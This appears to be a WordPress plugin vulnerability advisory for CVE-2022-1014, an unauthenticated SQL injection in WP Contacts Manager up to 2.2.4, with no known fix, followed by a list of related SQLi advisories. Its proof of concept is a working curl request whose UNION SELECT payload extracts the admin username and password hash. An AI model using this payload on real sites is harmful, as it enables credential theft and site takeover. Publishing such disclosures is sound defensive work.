WP Contacts Manager <= 2.2.4 – Unauthenticated SQLi | CVE 2022-1014 | Plugin Vulnerabilities

Description

The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability.

Proof of Concept

curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
    --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

Affects Plugins

wp-contacts-manager

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

eb9e202d-04aa-4343-86a2-4aa2edaa7f6b

Timeline

Publicly Published

2022-05-02 (about 2 years ago)

Added

2022-05-02 (about 2 years ago)

Last Updated

2022-05-02 (about 2 years ago)

Other

Published

Title

Published

2022-05-09

Title

Logo Slider <= 1.4.8 - Admin+ SQLi

Published

2022-12-02

Title

Advanced Booking Calendar <= 1.7.1 - Unauthenticated SQLi

Published

2021-01-03

Title

Contact Form Submissions < 1.7.1 - Authenticated SQL Injection

Published

2014-08-01

Title

SendIt <= 1.5.9 - Blind SQL Injection

Published

2016-04-08

Title

WP Multiple Meta Box 1.0 - Authenticated Blind SQL Injection